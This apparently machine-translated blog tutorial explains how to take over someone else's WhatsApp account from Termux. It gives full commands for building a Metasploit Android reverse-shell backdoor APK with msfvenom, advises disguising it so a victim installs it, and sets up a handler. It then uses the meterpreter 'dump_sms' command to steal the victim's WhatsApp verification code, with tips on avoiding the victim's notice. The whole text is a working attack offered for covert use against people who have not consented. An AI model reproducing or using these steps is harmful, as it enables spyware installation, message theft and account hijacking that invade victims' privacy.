How to hack whatsapp termux is a tutorial to view the contents of other people’s whatsapp chats remotely. Which will be used in this trick is the termux application and a tool called metasploit.
How it works, we will run metasploit from the termux application. Then enter the command to create a whatsapp hack application.
Well, the application must be sent to the target then we can freely tap the victim’s whatsapp. This technique is also known as a backdoor.
Maybe some of you have heard of the term backdoor/playload. Not only for wa tapping, this playload can also be used to control Android remotely.
But because now we are learning to tap wa using termux, so I will only discuss the related part. Here’s the full explanation.
How to Hack Termux Whatsapp Using Metasploit
This wa tapping method is different from the WhatsApp web, which will display a notification on the victim’s cellphone as shown below.

But the victim’s cellphone will not appear any notification. So it will not be known that we are the perpetrators of the piracy.
First we have to install the metasploit tools in the termux application. Just enter the command:
pkg install metasploit
If that fails, please follow the complete guide on how to install metasploit on termux.
Next we will make an application to hack whatsapp or commonly called a backdoor from metasploit. This application will be an intermediary between the victim’s cellphone and the metasploit tools that are being run.
When the backdoor is connected, we just need to enter the command from Metasploit to get the victim’s WhatsApp chat.
How, want to try?
Here’s how to hack wa termux via backdoor metasploit
1. Run the metasploit tool
Make sure you have installed metasploit correctly.
When done, type the following command in the initial screen of the termux application:
msfconsole
Wait for loading until metasploit can be launched.
Signs when we have entered these tools, just look at the picture below:

Usually above the metasploit code there is a logo (ASCII) that changes. Sometimes cows, skulls, steel tanks, etc. So if you run metasploit and then find a different logo, don’t worry.
2. Create a whatsapp hack app
You can set the name of the application yourself. But here I give an example with the name backdoor.apk (to make it easier to explain).
At the initial metasploit screen, enter the following command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk
Information :
– Replace LHOST with your IP address
– Backdoor.apk is the name of the application, please replace it with the name of your choice. (must end with .apk)
Above is 1 command line, that means don’t press enter before the last word ( /sdcard/ApplicationName.apk )
My recommendation, rename this application to a name that makes other people want to install it. Examples such as s*m*ntok.apk (shope pink), hack pulse.apk, etc.
Why should it be changed?
The goal is for the target to want to install the backdoor application. Because if it has been installed we can only do the next process.
If the application creation process is successful, it will appear on the Termux notification screen like this:
saved as: /sdcard/backdoor.apk
Please check the Android internal storage, make sure there is a file called backdoor.apk (or the name you wrote earlier).

If the apk creation process fails, try first to check the permissions of the termux application in the cellphone settings. Make sure there are permissions to access the storage. Then repeat the manufacturing process as above.
3. Connect the newly created app with metasploit
In order for the application to be connected, the main requirement is that the application must be installed on the target android for tapping wa.
So please send the .apk file to the person you want to tap or install on your own cellphone first, it’s also okay for experiments.
Then go back to the metasploit tool and enter the following command:
. use multi/handler . set payload android/meterpreter/reverse_tcp . set lhost ip kalian . set lport 4444 . exploit
Above are 5 command lines. Press enter every time you finish writing 1 command line.
Wait for the process of connecting between the application and metasploit. When connected, a “meterpreter>” will appear as shown below:

Notes:
Sometimes this linking process can fail. The solution is when the application is installed on the target cellphone, quickly enter the command use multi/handler on.
Also make sure that the internet connection you are using is not problematic.
Based on my experience, if the backdoor is installed on the cellphone itself, the meterpreter process will not be a problem. But when it is practiced on the other hand, sometimes the cellphone has to need to hang on the server.
4. Register a whatsapp account using the target number
Remember!! Make sure the process of connecting the apk is successful (there is a meterpreter on the termux screen).
Next, please create a WhatsApp account again with the target cellphone number.
Loh .. for what?
When the hack wa apk is connected, we can know all the notifications on the target cellphone. Now, by registering wa using the target number, we automatically need a whatsapp verification code sent to his number.
The whatsapp verification code can be found in step 5, for now, please complete the whatsapp account registration until the process of entering the verification code.
We recommend doing this trick at night or when the target is not accessing the cellphone. The reason is that he can be suspicious if there is an incoming sms containing the whatsapp verification code.
5. Retrieve whatsapp verification code from SMS dump
Please return to the termux application which is displaying the meterpreter.
Then enter the following code to get the victim’s whatsapp verification code:
dump_sms
Next, a file name ending in .txt will appear

You just copy the file name and then go to new season termux.
The trick is to swipe the screen from left to right and select new season.

Then enter the following command:
nano namafile.txt contoh : nano sms_dump_121374564848.txt
If you can’t, try entering the command first pkg install nano -y to install nano editor.
Well, when the .txt file is open, you will get all messages from the victim’s cellphone. Just look for the sms containing the verification code from whatsapp.
After finding it, copy the verification code and enter it in your WhatsApp registration which was stopped before.
And taraaaaa… you have successfully hacked the target whatsapp account.
Maybe some of you are still having trouble or even confused. To help understanding, I have included a tutorial in the form of the following video.
https://youtu.be/A5nARHURe3M
For beginners who are not so able to use termux, it may be difficult. My advice, please join the cyber newbi group (bottom right corner) so you can get a solution to the problem that is currently happening.
Or you can also directly ask it directly through the comments column below.
My own practice, it took me 2 days to practice how to hack whatsapp termux until it worked. I kept repeating the video and rereading the source article (termux.id) until I finally understood it.
And the problem that often arises is when connecting the backdoor with our cellphones. In the meterpreter process, sometimes it connects and breaks, so you have to start over from the beginning.
Okay, until here first our language this time, hopefully it can be useful. Thanks for reading and don’t forget to share, friends.